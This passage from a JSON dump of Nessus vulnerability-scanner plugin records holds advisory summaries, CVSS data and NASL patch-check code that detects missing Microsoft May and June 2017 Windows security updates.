value:\"MS17-4019214\");\n script_xref(name:\"MSFT\", value:\"MS17-4019216\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows Server 2012 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019214\nor cumulative update 4019216. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019214/windows-server-2012-update-kb4019214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ae1f0e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019214 or Cumulative update KB4019216.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019214', # 2012 Monthly Rollup\n '4019216' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) 
audit(AUDIT_SHARE_FAIL, share);\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019214,4019216]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T16:25:55", "description": "The remote Windows Vista host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - Multiple information disclosure vulnerabilities exist in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit these, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit these, via a crafted SMB request, to cause the system to stop responding. (CVE-2017-0269, CVE-2017-0273, CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit these, via a specially crafted packet, to execute arbitrary code on a target server. 
(CVE-2017-0272, CVE-2017-0277, CVE-2017-0278, CVE-2017-0279)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "type": "nessus", "title": "Microsoft Security Advisory 4025685: Windows Vista (June 2017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0222", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4025685_VISTA.NASL", "href": "https://www.tenable.com/plugins/nessus/100785", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100785);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n 
script_cve_id(\n \"CVE-2017-0222\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8464\",\n \"CVE-2017-8543\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98127,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98818,\n 98824,\n 99035\n );\n script_xref(name:\"MSKB\", value:\"4018271\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4021903\");\n script_xref(name:\"MSKB\", value:\"4024402\");\n script_xref(name:\"MSFT\", value:\"MS17-4018271\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4021903\");\n script_xref(name:\"MSFT\", value:\"MS17-4024402\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"Microsoft Security Advisory 4025685: Windows Vista (June 2017)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows Vista host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - Multiple information disclosure vulnerabilities exist in\n the Microsoft Server Message Block 1.0 (SMBv1) server\n when handling certain requests. An unauthenticated,\n remote attacker can exploit these, via a specially\n crafted packet, to disclose sensitive information.\n (CVE-2017-0267, CVE-2017-0268, CVE-2017-0270,\n CVE-2017-0271, CVE-2017-0274, CVE-2017-0275,\n CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in\n Microsoft Server Message Block (SMB) when handling a\n specially crafted request to the server. An\n unauthenticated, remote attacker can exploit these, via\n a crafted SMB request, to cause the system to stop\n responding. (CVE-2017-0269, CVE-2017-0273,\n CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in\n the Microsoft Server Message Block 1.0 (SMBv1) server\n when handling certain requests. An unauthenticated,\n remote attacker can exploit these, via a specially\n crafted packet, to execute arbitrary code on a target\n server. (CVE-2017-0272, CVE-2017-0277, CVE-2017-0278,\n CVE-2017-0279)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. 
(CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2017/4025685\");\n # https://support.microsoft.com/en-us/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0780816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-06\";\nkbs = make_list(\n \"4018271\",\n \"4018466\",\n \"4021903\",\n \"4024402\",\n \"4019204\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\n# Only Vista\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 4018271 aka CVE-2017-0222\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16896\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21007\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, 
kb:\"4018271\") ||\n\n # 4018466 aka CVE-2017-0267 to 0280\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netevent.dll\", version:\"6.0.6002.19673\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018466\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netevent.dll\", version:\"6.0.6002.24089\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018466\") ||\n\n # 4021903 aka CVE-2017-8464\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.19785\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.24102\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\") ||\n\n # 4024402 aka CVE-2017-8543\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"searchindexer.exe\", version:\"7.0.6002.19805\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"searchindexer.exe\", version:\"7.0.6002.24123\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\") ||\n\n # 4019204 aka CVE-2017-8552\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19778\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24095\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\")\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:28", "description": "The remote Windows host is missing security update 
4019213 or cumulative update 4019215. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. 
(CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0228", "CVE-2017-0231", "CVE-2017-0238", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019215.NASL", "href": "https://www.tenable.com/plugins/nessus/100057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100057);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0228\",\n \"CVE-2017-0231\",\n 